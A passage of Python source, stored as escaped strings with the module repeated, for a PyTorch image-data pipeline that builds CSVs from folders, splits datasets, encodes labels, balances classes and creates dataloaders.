= dict((k, v) for k, v in zip(c.keys(), diffs))\n minorities = [c.keys()[x] for x, y in enumerate(lc) if y < thresh *\n max_count]\n return minorities, diffs\n\n\ndef csv_from_path(path, img_dest):\n path = Path(path)\n img_dest = Path(img_dest)\n labels_paths = list(path.iterdir())\n tr_images = []\n tr_labels = []\n for l in labels_paths:\n if l.is_dir():\n for i in list(l.iterdir()):\n if i.suffix in IMG_EXTENSIONS:\n name = i.name\n label = l.name\n new_name = '{}_{}'.format(path.name, name)\n new_path = img_dest / new_name\n os.rename(i, new_path)\n tr_images.append(new_name)\n tr_labels.append(label)\n tr_img_label = {'Img': tr_images, 'Label': 
tr_labels}\n csv = pd.DataFrame(tr_img_label, columns=['Img', 'Label'])\n csv = csv.sample(frac=1).reset_index(drop=True)\n return csv\n\n\ndef add_extension(a, e):\n a = [(x + e) for x in a]\n return a\n\n\ndef one_hot(targets, multi=False):\n if multi:\n binerizer = MultiLabelBinarizer()\n dai_1hot = binerizer.fit_transform(targets)\n else:\n binerizer = LabelBinarizer()\n dai_1hot = binerizer.fit_transform(targets)\n return dai_1hot, binerizer.classes_\n\n\ndef get_index(arr, a):\n for i in range(len(arr)):\n if sum(arr[i] == a) == len(a):\n return i\n return False\n\n\ndef rescale_bbox(bb, row_scale, col_scale):\n bb = bb.reshape((-1, 4))\n for b in bb:\n r1, c1, r2, c2 = b\n b[0] = int(np.round(r1 * col_scale))\n b[1] = int(np.round(c1 * row_scale))\n b[2] = int(np.round(r2 * col_scale))\n b[3] = int(np.round(c2 * row_scale))\n bb = bb.reshape((1, -1))\n return bb\n\n\ndef get_img_stats(dataset, sz):\n size = int(len(dataset) * sz)\n i = 0\n imgs = []\n for img, _ in dataset:\n if i > size:\n break\n imgs.append(img)\n i += 1\n imgs_ = torch.stack(imgs, dim=3)\n imgs_ = imgs_.view(3, -1)\n imgs_mean = imgs_.mean(dim=1)\n imgs_std = imgs_.std(dim=1)\n return imgs_mean, imgs_std\n\n\ndef split_df(train_df, test_size=0.15):\n try:\n train_df, val_df = train_test_split(train_df, test_size=test_size,\n random_state=2, stratify=train_df.iloc[:, 1])\n except:\n train_df, val_df = train_test_split(train_df, test_size=test_size,\n random_state=2)\n train_df = train_df.reset_index(drop=True)\n val_df = val_df.reset_index(drop=True)\n return train_df, val_df\n\n\ndef save_obj(obj, path):\n with open(path, 'wb') as f:\n pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)\n\n\ndef load_obj(path):\n with open(path, 'rb') as f:\n return pickle.load(f)\n\n\nclass DataProcessor:\n\n def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=\n False, tr_name='train', val_name='val', test_name='test', extension\n =None, setup_data=True):\n print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else\n 'cpu')\n (self.data_path, self.train_csv, self.val_csv, self.reg, self.\n tr_name, self.val_name, self.test_name, self.extension) = (\n data_path, train_csv, val_csv, reg, tr_name, val_name,\n test_name, extension)\n self.obj = False\n self.multi_label = False\n if setup_data:\n self.set_up_data()\n\n def set_up_data(self, split_size=0.15):\n data_path, train_csv, val_csv, tr_name, val_name, test_name = (self\n .data_path, self.train_csv, self.val_csv, self.tr_name, self.\n val_name, self.test_name)\n if not data_path:\n data_path = os.getcwd() + '/'\n tr_path = os.path.join(data_path, tr_name)\n val_path = os.path.join(data_path, val_name)\n test_path = os.path.join(data_path, test_name)\n if os.path.exists(os.path.join(data_path, tr_name + '.csv')):\n train_csv = tr_name + '.csv'\n if not train_csv:\n print('no')\n train_csv, val_csv, test_csv = self.data_from_paths_to_csv(\n data_path, tr_path, val_path, test_path)\n train_csv_path = os.path.join(data_path, train_csv)\n train_df = pd.read_csv(train_csv_path)\n if 'Unnamed: 0' in train_df.columns:\n train_df = train_df.drop('Unnamed: 0', 1)\n if len(train_df.columns) > 2:\n self.obj = True\n img_names = [str(x) for x in list(train_df.iloc[:, 0])]\n if self.extension:\n img_names = add_extension(img_names, self.extension)\n if val_csv:\n val_csv_path = os.path.join(data_path, val_csv)\n val_df = 
pd.read_csv(val_csv_path)\n val_targets = list(map(str, list(val_df.iloc[:, 1])))\n if test_csv:\n test_csv_path = os.path.join(data_path, test_csv)\n test_df = pd.read_csv(test_csv_path)\n test_targets = list(map(str, list(test_df.iloc[:, 1])))\n targets = list(map(str, list(train_df.iloc[:, 1])))\n lengths = [len(t) for t in [s.split() for s in targets]]\n self.target_lengths = lengths\n split_targets = [t.split() for t in targets]\n if self.obj:\n print('\\nObject Detection\\n')\n int_targets = [list(map(float, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n obj_targets = list(map(str, list(train_df.iloc[:, 2])))\n obj_split_targets = [t.split() for t in obj_targets]\n try:\n obj_split_targets = [list(map(int, x)) for x in\n obj_split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(obj_split_targets, True)\n c_names = list(onehot_classes)\n class_idx = [[c_names.index(i) for i in c] for c in\n obj_split_targets]\n zero_idx = np.zeros((len(targets), max(lengths) // 4), dtype=int)\n for i, t in enumerate(zero_idx):\n t[len(t) - len(class_idx[i]):] = class_idx[i]\n zero_idx[i] = t\n train_df.iloc[:, 2] = [torch.from_numpy(z).type(torch.\n LongTensor) for z in zero_idx]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n elif self.reg:\n print('\\nRegression\\n')\n int_targets = [list(map(int, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n self.data_dir, self.num_classes, self.class_names = data_path, max(\n lengths), np.unique(zero_targets, axis=1)\n elif lengths[1:] != lengths[:-1]:\n self.multi_label = True\n print('\\nMulti-label Classification\\n')\n try:\n split_targets = [list(map(int, x)) for x in split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(split_targets, self.\n multi_label)\n train_df.iloc[:, 1] = [torch.from_numpy(x).type(torch.\n FloatTensor) for x in dai_onehot]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n else:\n print('\\nSingle-label Classification\\n')\n unique_targets = list(np.unique(targets))\n target_ids = [unique_targets.index(x) for x in targets]\n train_df.iloc[:, 1] = target_ids\n if val_csv:\n target_ids = [unique_targets.index(x) for x in val_targets]\n val_df.iloc[:, 1] = target_ids\n if test_csv:\n target_ids = [unique_targets.index(x) for x in test_targets]\n test_df.iloc[:, 1] = target_ids\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n unique_targets), unique_targets\n if not val_csv:\n train_df, val_df = split_df(train_df, split_size)\n if not test_csv:\n val_df, test_df = split_df(val_df, split_size)\n tr_images = [str(x) for x in list(train_df.iloc[:, 0])]\n val_images = [str(x) for x in list(val_df.iloc[:, 0])]\n test_images = [str(x) for x in list(test_df.iloc[:, 0])]\n if self.extension:\n tr_images = add_extension(tr_images, self.extension)\n val_images = add_extension(val_images, self.extension)\n test_images = add_extension(test_images, self.extension)\n 
train_df.iloc[:, 0] = tr_images\n val_df.iloc[:, 0] = val_images\n test_df.iloc[:, 0] = test_images\n train_df.to_csv(os.path.join(data_path, 'train.csv'), index=False)\n val_df.to_csv(os.path.join(data_path, 'val.csv'), index=False)\n test_df.to_csv(os.path.join(data_path, 'test.csv'), index=False)\n self.minorities, self.class_diffs = None, None\n if not self.obj or not self.multi_label:\n self.minorities, self.class_diffs = get_minorities(train_df)\n self.data_dfs = {self.tr_name: train_df, self.val_name: val_df,\n self.test_name: test_df}\n data_dict = {'data_dfs': self.data_dfs, 'data_dir': self.data_dir,\n 'num_classes': self.num_classes, 'class_names': self.\n class_names, 'minorities': self.minorities, 'class_diffs': self\n .class_diffs, 'obj': self.obj, 'multi_label': self.multi_label}\n self.data_dict = data_dict\n return data_dict\n\n def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,\n test_path=None):\n train_df = csv_from_path(tr_path, tr_path)\n train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),\n index=False)\n ret = self.tr_name + '.csv', None\n if val_path is not None:\n val_exists = os.path.exists(val_path)\n if val_exists:\n val_df = csv_from_path(val_path, tr_path)\n val_df.to_csv(os.path.join(data_path, self.val_name +\n '.csv'), index=False)\n ret = self.tr_name + '.csv', self.val_name + '.csv'\n if test_path is not None:\n test_exists = os.path.exists(test_path)\n if test_exists:\n test_df = csv_from_path(test_path, tr_path)\n test_df.to_csv(os.path.join(data_path, self.test_name +\n '.csv'), index=False)\n ret = (self.tr_name + '.csv', self.val_name + '.csv', self.\n test_name + '.csv')\n return ret\n\n def get_data(self, data_dict=None, s=(224, 224), dataset=\n my_image_csv_dataset, bs=32, balance=False, tfms=None, bal_tfms=\n None, tta=False, num_workers=4, stats_percentage=0.6):\n self.image_size = s\n if not data_dict:\n data_dict = self.data_dict\n data_dfs, data_dir, minorities, class_diffs, obj, multi_label = (\n data_dict['data_dfs'], data_dict['data_dir'], data_dict[\n 'minorities'], data_dict['class_diffs'], data_dict['obj'],\n data_dict['multi_label'])\n if obj or multi_label:\n balance = False\n if tta:\n tta_tfms = {self.tr_name: transforms.Compose([transforms.\n FiveCrop(s[0]), transforms.Lambda(lambda crops: torch.stack\n ([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops: torch.stack([transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(\n crop) for crop in crops]))]), self.val_name: transforms.\n Compose([transforms.FiveCrop(s[0]), transforms.Lambda(lambda\n crops: torch.stack([transforms.ToTensor()(crop) for crop in\n crops])), transforms.Lambda(lambda crops: torch.stack([\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])(crop) for crop in crops]))]), self.test_name:\n transforms.Compose([transforms.FiveCrop(s[0]), transforms.\n Lambda(lambda crops: torch.stack([transforms.ToTensor()(\n crop) for crop in crops])), transforms.Lambda(lambda crops:\n torch.stack([transforms.Normalize([0.485, 0.456, 0.406], [\n 0.229, 0.224, 0.225])(crop) for crop in crops]))])}\n else:\n tta_tfms = None\n if not bal_tfms:\n bal_tfms = {self.tr_name: [transforms.RandomHorizontalFlip()],\n self.val_name: None, self.test_name: None}\n else:\n bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.\n test_name: None}\n if obj:\n resize_transform = transforms.Resize(s)\n else:\n resize_transform = transforms.Resize(s)\n if not tfms:\n tfms = [resize_transform, 
transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]\n else:\n tfms_temp = [resize_transform, transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])]\n tfms_temp[1:1] = tfms\n tfms = tfms_temp\n print(tfms)\n data_transforms = {self.tr_name: tfms, self.val_name: [transforms.\n Resize(s), transforms.ToTensor(), transforms.Normalize([0.485, \n 0.456, 0.406], [0.229, 0.224, 0.225])], self.test_name: [\n transforms.Resize(s), transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}\n temp_tfms = [resize_transform, transforms.ToTensor()]\n temp_dataset = dataset(os.path.join(data_dir, self.tr_name),\n data_dfs[self.tr_name], temp_tfms)\n self.img_mean, self.img_std = get_img_stats(temp_dataset,\n stats_percentage)\n data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][\n -1].std = self.img_mean, self.img_std\n data_transforms[self.val_name][-1].mean, data_transforms[self.val_name\n ][-1].std = self.img_mean, self.img_std\n data_transforms[self.test_name][-1].mean, data_transforms[self.\n test_name][-1].std = self.img_mean, self.img_std\n if balance:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj, minorities,\n class_diffs, bal_tfms[x]) for x in [self.tr_name, self.\n val_name, self.test_name]}\n else:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj) for x in [\n self.tr_name, self.val_name, self.test_name]}\n dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],\n batch_size=bs, shuffle=True, num_workers=num_workers) for x in\n [self.tr_name, self.val_name, self.test_name]}\n dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name,\n self.val_name, self.test_name]}\n self.image_datasets, self.dataloaders, self.dataset_sizes = (\n image_datasets, dataloaders, dataset_sizes)\n return image_datasets, dataloaders, dataset_sizes\n\n def imshow(self, inp, title=None):\n \"\"\"Imshow for Tensor.\"\"\"\n inp = self.denorm_img(inp)\n plt.imshow(inp)\n if title:\n plt.title(title)\n plt.pause(0.001)\n\n def denorm_img(self, inp, calculate=False):\n inp = inp.numpy().transpose((1, 2, 0))\n if calculate:\n mean = np.mean(inp)\n std = np.std(inp)\n else:\n mean = self.img_mean.numpy()\n std = self.img_std.numpy()\n inp = std * inp + mean\n inp = np.clip(inp, 0, 1)\n return inp\n\n def show_data(self, folder_name='train', size=(64, 64), bs=5):\n self.get_data(size, bs)\n batch = next(iter(self.dataloaders[folder_name]))\n inputs, classes = batch[0], batch[1]\n out = torchvision.utils.make_grid(inputs)\n if self.reg:\n print(classes)\n self.imshow(out, title=[x for x in classes])\n elif self.multi_label:\n self.imshow(out, title=[self.class_names[np.nonzero(x.type(\n torch.LongTensor))] for x in classes])\n else:\n self.imshow(out, title=[self.class_names[x] for x in classes])\n", "<import token>\n\n\nclass my_image_csv_dataset(Dataset):\n\n def __init__(self, data_dir, data, transforms_=None, obj=False,\n minorities=None, diffs=None, bal_tfms=None):\n self.data_dir = data_dir\n self.data = data\n self.transforms_ = transforms_\n self.tfms = None\n self.obj = obj\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n assert transforms_ is not None, print('Please pass some transforms.')\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, index):\n img_path = os.path.join(self.data_dir, 
self.data.iloc[index, 0])\n img = Image.open(img_path)\n img = img.convert('RGB')\n img = torchvision.transforms.functional.to_grayscale(img,\n num_output_channels=3)\n y = self.data.iloc[index, 1]\n if self.minorities and self.bal_tfms:\n if y in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[y]\n l = [self.bal_tfms]\n l.extend(self.transforms_)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[y]\n self.transforms_[1:1] = self.bal_tfms\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n x = self.tfms(img)\n if self.obj:\n s = x.size()[1]\n if isinstance(s, tuple):\n s = s[0]\n row_scale = s / img.size[0]\n col_scale = s / img.size[1]\n y = rescale_bbox(y, row_scale, col_scale)\n y.squeeze_()\n y2 = self.data.iloc[index, 2]\n y = y, y2\n return x, y\n\n\nclass my_image_folder(DatasetFolder):\n\n def __init__(self, root, transform=None, target_transform=None, loader=\n default_loader, minorities=None, diffs=None, bal_tfms=None,\n tta_tfms=None):\n super(my_image_folder, self).__init__(root, loader, IMG_EXTENSIONS,\n transform=transform, target_transform=target_transform)\n self.imgs = self.samples\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n self.tta_tfms = tta_tfms\n self.tfms = None\n\n def __getitem__(self, index):\n path, target = self.samples[index]\n sample = self.loader(path)\n if self.transform:\n if self.minorities and self.bal_tfms:\n if target in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[target]\n l = [self.bal_tfms]\n l.extend(self.transform)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[target]\n self.tfms = transforms.Compose(self.bal_tfms + self\n .transform)\n else:\n self.tfms = transforms.Compose(self.transform)\n elif self.tta_tfms:\n self.tfms = self.tta_tfms\n else:\n self.tfms = transforms.Compose(self.transform)\n sample = self.tfms(sample)\n if self.target_transform:\n target = self.target_transform(target)\n return sample, target\n\n\ndef extract_data(dt):\n x = []\n y = []\n for a, b in dt:\n x.append(a)\n y.append(b)\n return x, y\n\n\ndef listdir_fullpath(d):\n return [os.path.join(d, f) for f in os.listdir(d)]\n\n\ndef get_minorities(df, thresh=0.8):\n c = df.iloc[:, 1].value_counts()\n lc = list(c)\n max_count = lc[0]\n diffs = [(1 - x / max_count) for x in lc]\n diffs = dict((k, v) for k, v in zip(c.keys(), diffs))\n minorities = [c.keys()[x] for x, y in enumerate(lc) if y < thresh *\n max_count]\n return minorities, diffs\n\n\ndef csv_from_path(path, img_dest):\n path = Path(path)\n img_dest = Path(img_dest)\n labels_paths = list(path.iterdir())\n tr_images = []\n tr_labels = []\n for l in labels_paths:\n if l.is_dir():\n for i in list(l.iterdir()):\n if i.suffix in IMG_EXTENSIONS:\n name = i.name\n label = l.name\n new_name = '{}_{}'.format(path.name, name)\n new_path = img_dest / new_name\n os.rename(i, new_path)\n tr_images.append(new_name)\n tr_labels.append(label)\n tr_img_label = {'Img': tr_images, 'Label': tr_labels}\n csv = pd.DataFrame(tr_img_label, columns=['Img', 'Label'])\n csv = csv.sample(frac=1).reset_index(drop=True)\n return csv\n\n\ndef add_extension(a, e):\n a = [(x + e) for x in a]\n return a\n\n\ndef one_hot(targets, multi=False):\n if multi:\n binerizer = 
MultiLabelBinarizer()\n dai_1hot = binerizer.fit_transform(targets)\n else:\n binerizer = LabelBinarizer()\n dai_1hot = binerizer.fit_transform(targets)\n return dai_1hot, binerizer.classes_\n\n\ndef get_index(arr, a):\n for i in range(len(arr)):\n if sum(arr[i] == a) == len(a):\n return i\n return False\n\n\ndef rescale_bbox(bb, row_scale, col_scale):\n bb = bb.reshape((-1, 4))\n for b in bb:\n r1, c1, r2, c2 = b\n b[0] = int(np.round(r1 * col_scale))\n b[1] = int(np.round(c1 * row_scale))\n b[2] = int(np.round(r2 * col_scale))\n b[3] = int(np.round(c2 * row_scale))\n bb = bb.reshape((1, -1))\n return bb\n\n\ndef get_img_stats(dataset, sz):\n size = int(len(dataset) * sz)\n i = 0\n imgs = []\n for img, _ in dataset:\n if i > size:\n break\n imgs.append(img)\n i += 1\n imgs_ = torch.stack(imgs, dim=3)\n imgs_ = imgs_.view(3, -1)\n imgs_mean = imgs_.mean(dim=1)\n imgs_std = imgs_.std(dim=1)\n return imgs_mean, imgs_std\n\n\ndef split_df(train_df, test_size=0.15):\n try:\n train_df, val_df = train_test_split(train_df, test_size=test_size,\n random_state=2, stratify=train_df.iloc[:, 1])\n except:\n train_df, val_df = train_test_split(train_df, test_size=test_size,\n random_state=2)\n train_df = train_df.reset_index(drop=True)\n val_df = val_df.reset_index(drop=True)\n return train_df, val_df\n\n\ndef save_obj(obj, path):\n with open(path, 'wb') as f:\n pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)\n\n\ndef load_obj(path):\n with open(path, 'rb') as f:\n return pickle.load(f)\n\n\nclass DataProcessor:\n\n def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=\n False, tr_name='train', val_name='val', test_name='test', extension\n =None, setup_data=True):\n print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else\n 'cpu')\n (self.data_path, self.train_csv, self.val_csv, self.reg, self.\n tr_name, self.val_name, self.test_name, self.extension) = (\n data_path, train_csv, val_csv, reg, tr_name, val_name,\n test_name, extension)\n self.obj = False\n self.multi_label = False\n if setup_data:\n self.set_up_data()\n\n def set_up_data(self, split_size=0.15):\n data_path, train_csv, val_csv, tr_name, val_name, test_name = (self\n .data_path, self.train_csv, self.val_csv, self.tr_name, self.\n val_name, self.test_name)\n if not data_path:\n data_path = os.getcwd() + '/'\n tr_path = os.path.join(data_path, tr_name)\n val_path = os.path.join(data_path, val_name)\n test_path = os.path.join(data_path, test_name)\n if os.path.exists(os.path.join(data_path, tr_name + '.csv')):\n train_csv = tr_name + '.csv'\n if not train_csv:\n print('no')\n train_csv, val_csv, test_csv = self.data_from_paths_to_csv(\n data_path, tr_path, val_path, test_path)\n train_csv_path = os.path.join(data_path, train_csv)\n train_df = pd.read_csv(train_csv_path)\n if 'Unnamed: 0' in train_df.columns:\n train_df = train_df.drop('Unnamed: 0', 1)\n if len(train_df.columns) > 2:\n self.obj = True\n img_names = [str(x) for x in list(train_df.iloc[:, 0])]\n if self.extension:\n img_names = add_extension(img_names, self.extension)\n if val_csv:\n val_csv_path = os.path.join(data_path, val_csv)\n val_df = pd.read_csv(val_csv_path)\n val_targets = list(map(str, list(val_df.iloc[:, 1])))\n if test_csv:\n test_csv_path = os.path.join(data_path, test_csv)\n test_df = pd.read_csv(test_csv_path)\n test_targets = list(map(str, list(test_df.iloc[:, 1])))\n targets = list(map(str, 
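# A minimal sketch of the sklearn binarizers behind one_hot() above:
# LabelBinarizer one-hot encodes single-label targets, MultiLabelBinarizer
# multi-hot encodes variable-length targets (the multi-label branch). The
# module's variable name "binerizer" is a spelling of "binarizer"; behaviour
# is unaffected. Toy labels for illustration only.
from sklearn.preprocessing import LabelBinarizer, MultiLabelBinarizer

lb = LabelBinarizer()
single = lb.fit_transform(['cat', 'dog', 'bird'])        # (3, 3) one-hot
mlb = MultiLabelBinarizer()
multi = mlb.fit_transform([['cat'], ['cat', 'dog']])     # (2, 2) multi-hot
print(lb.classes_, single.tolist())   # ['bird' 'cat' 'dog'] ...
print(mlb.classes_, multi.tolist())   # ['cat' 'dog'] [[1, 0], [1, 1]]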
list(train_df.iloc[:, 1])))\n lengths = [len(t) for t in [s.split() for s in targets]]\n self.target_lengths = lengths\n split_targets = [t.split() for t in targets]\n if self.obj:\n print('\\nObject Detection\\n')\n int_targets = [list(map(float, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n obj_targets = list(map(str, list(train_df.iloc[:, 2])))\n obj_split_targets = [t.split() for t in obj_targets]\n try:\n obj_split_targets = [list(map(int, x)) for x in\n obj_split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(obj_split_targets, True)\n c_names = list(onehot_classes)\n class_idx = [[c_names.index(i) for i in c] for c in\n obj_split_targets]\n zero_idx = np.zeros((len(targets), max(lengths) // 4), dtype=int)\n for i, t in enumerate(zero_idx):\n t[len(t) - len(class_idx[i]):] = class_idx[i]\n zero_idx[i] = t\n train_df.iloc[:, 2] = [torch.from_numpy(z).type(torch.\n LongTensor) for z in zero_idx]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n elif self.reg:\n print('\\nRegression\\n')\n int_targets = [list(map(int, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n self.data_dir, self.num_classes, self.class_names = data_path, max(\n lengths), np.unique(zero_targets, axis=1)\n elif lengths[1:] != lengths[:-1]:\n self.multi_label = True\n print('\\nMulti-label Classification\\n')\n try:\n split_targets = [list(map(int, x)) for x in split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(split_targets, self.\n multi_label)\n train_df.iloc[:, 1] = [torch.from_numpy(x).type(torch.\n FloatTensor) for x in dai_onehot]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n else:\n print('\\nSingle-label Classification\\n')\n unique_targets = list(np.unique(targets))\n target_ids = [unique_targets.index(x) for x in targets]\n train_df.iloc[:, 1] = target_ids\n if val_csv:\n target_ids = [unique_targets.index(x) for x in val_targets]\n val_df.iloc[:, 1] = target_ids\n if test_csv:\n target_ids = [unique_targets.index(x) for x in test_targets]\n test_df.iloc[:, 1] = target_ids\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n unique_targets), unique_targets\n if not val_csv:\n train_df, val_df = split_df(train_df, split_size)\n if not test_csv:\n val_df, test_df = split_df(val_df, split_size)\n tr_images = [str(x) for x in list(train_df.iloc[:, 0])]\n val_images = [str(x) for x in list(val_df.iloc[:, 0])]\n test_images = [str(x) for x in list(test_df.iloc[:, 0])]\n if self.extension:\n tr_images = add_extension(tr_images, self.extension)\n val_images = add_extension(val_images, self.extension)\n test_images = add_extension(test_images, self.extension)\n train_df.iloc[:, 0] = tr_images\n val_df.iloc[:, 0] = val_images\n test_df.iloc[:, 0] = test_images\n train_df.to_csv(os.path.join(data_path, 'train.csv'), index=False)\n val_df.to_csv(os.path.join(data_path, 'val.csv'), index=False)\n test_df.to_csv(os.path.join(data_path, 
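# A sketch of the split_df() pattern used above: attempt a stratified split on
# the label column and fall back to a plain random split when stratification
# is impossible (e.g. a class with a single sample). ValueError is the
# specific exception train_test_split raises there, narrower than the
# module's bare except.
import pandas as pd
from sklearn.model_selection import train_test_split

df = pd.DataFrame({'Img': [f'{i}.jpg' for i in range(10)],
                   'Label': ['a'] * 5 + ['b'] * 5})
try:
    tr, va = train_test_split(df, test_size=0.2, random_state=2,
                              stratify=df.iloc[:, 1])
except ValueError:
    tr, va = train_test_split(df, test_size=0.2, random_state=2)
tr, va = tr.reset_index(drop=True), va.reset_index(drop=True)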
'test.csv'), index=False)\n self.minorities, self.class_diffs = None, None\n if not self.obj or not self.multi_label:\n self.minorities, self.class_diffs = get_minorities(train_df)\n self.data_dfs = {self.tr_name: train_df, self.val_name: val_df,\n self.test_name: test_df}\n data_dict = {'data_dfs': self.data_dfs, 'data_dir': self.data_dir,\n 'num_classes': self.num_classes, 'class_names': self.\n class_names, 'minorities': self.minorities, 'class_diffs': self\n .class_diffs, 'obj': self.obj, 'multi_label': self.multi_label}\n self.data_dict = data_dict\n return data_dict\n\n def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,\n test_path=None):\n train_df = csv_from_path(tr_path, tr_path)\n train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),\n index=False)\n ret = self.tr_name + '.csv', None\n if val_path is not None:\n val_exists = os.path.exists(val_path)\n if val_exists:\n val_df = csv_from_path(val_path, tr_path)\n val_df.to_csv(os.path.join(data_path, self.val_name +\n '.csv'), index=False)\n ret = self.tr_name + '.csv', self.val_name + '.csv'\n if test_path is not None:\n test_exists = os.path.exists(test_path)\n if test_exists:\n test_df = csv_from_path(test_path, tr_path)\n test_df.to_csv(os.path.join(data_path, self.test_name +\n '.csv'), index=False)\n ret = (self.tr_name + '.csv', self.val_name + '.csv', self.\n test_name + '.csv')\n return ret\n\n def get_data(self, data_dict=None, s=(224, 224), dataset=\n my_image_csv_dataset, bs=32, balance=False, tfms=None, bal_tfms=\n None, tta=False, num_workers=4, stats_percentage=0.6):\n self.image_size = s\n if not data_dict:\n data_dict = self.data_dict\n data_dfs, data_dir, minorities, class_diffs, obj, multi_label = (\n data_dict['data_dfs'], data_dict['data_dir'], data_dict[\n 'minorities'], data_dict['class_diffs'], data_dict['obj'],\n data_dict['multi_label'])\n if obj or multi_label:\n balance = False\n if tta:\n tta_tfms = {self.tr_name: transforms.Compose([transforms.\n FiveCrop(s[0]), transforms.Lambda(lambda crops: torch.stack\n ([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops: torch.stack([transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(\n crop) for crop in crops]))]), self.val_name: transforms.\n Compose([transforms.FiveCrop(s[0]), transforms.Lambda(lambda\n crops: torch.stack([transforms.ToTensor()(crop) for crop in\n crops])), transforms.Lambda(lambda crops: torch.stack([\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])(crop) for crop in crops]))]), self.test_name:\n transforms.Compose([transforms.FiveCrop(s[0]), transforms.\n Lambda(lambda crops: torch.stack([transforms.ToTensor()(\n crop) for crop in crops])), transforms.Lambda(lambda crops:\n torch.stack([transforms.Normalize([0.485, 0.456, 0.406], [\n 0.229, 0.224, 0.225])(crop) for crop in crops]))])}\n else:\n tta_tfms = None\n if not bal_tfms:\n bal_tfms = {self.tr_name: [transforms.RandomHorizontalFlip()],\n self.val_name: None, self.test_name: None}\n else:\n bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.\n test_name: None}\n if obj:\n resize_transform = transforms.Resize(s)\n else:\n resize_transform = transforms.Resize(s)\n if not tfms:\n tfms = [resize_transform, transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]\n else:\n tfms_temp = [resize_transform, transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])]\n tfms_temp[1:1] = tfms\n tfms = tfms_temp\n 
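# The `tfms_temp[1:1] = tfms` splice above inserts user-supplied transforms
# between Resize and ToTensor, so custom augmentations operate on PIL images
# while Normalize stays last. A minimal illustration of the slice-insert
# idiom with assumed example transforms:
from torchvision import transforms

base = [transforms.Resize((224, 224)), transforms.ToTensor(),
        transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]
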